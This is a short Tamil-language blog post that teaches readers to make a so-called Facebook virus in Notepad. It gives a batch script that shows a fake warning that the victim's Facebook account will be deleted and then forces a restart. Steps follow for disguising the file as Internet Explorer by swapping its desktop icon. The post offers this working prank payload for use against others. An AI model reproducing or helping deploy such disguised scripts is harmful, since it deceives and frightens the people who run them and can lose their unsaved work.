நான் இப்போது இடப்போகும் இடுகைஎவ்வாறு சில கட்டளைகளைக்கொண்டு நமது Notepad ல் Facebook க்கான virus ஐ உருவாக்குவது என்பதை பற்றி.
1.Notepad ஐ திறந்து அதில்
1.Notepad ஐ திறந்து அதில்
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."
என type செய்க.
2. அதை Internet Explorer .bat ஆக பதியவும்.
3. Internet Explorer .bat இல் Right click செய்து Create Shortcut ஐ click செய்யவும்.
4. உங்களது shortcut ல் Right click செய்து Properties ஐ click செய்யவும்.
5. அதன் Icon ஐ மாற்றவும்.
6. Internet Explorer, icon ஐ தெரிவுசெய்து click OK, click APPLY.
7. உங்களது Desktop ல் உள்ள Internet explorer, Icon ஐ அழித்து விட்டு உங்கள் icon ஐ
Replace செய்யவும். இனி யாரவது Internet explorer ஐ திறந்தால் எப்படி ஒரு
தகவல் வந்து உங்கள் கணணி அணைந்துவிடும்.
Please Write your comment.
கருத்துகள் இல்லை:
கருத்துரையிடுக
இந்த பதிவிலுள்ள குறைகளையும், இந்த தளம் பற்றிய கருத்துக்களையும் குறிப்பிடுக.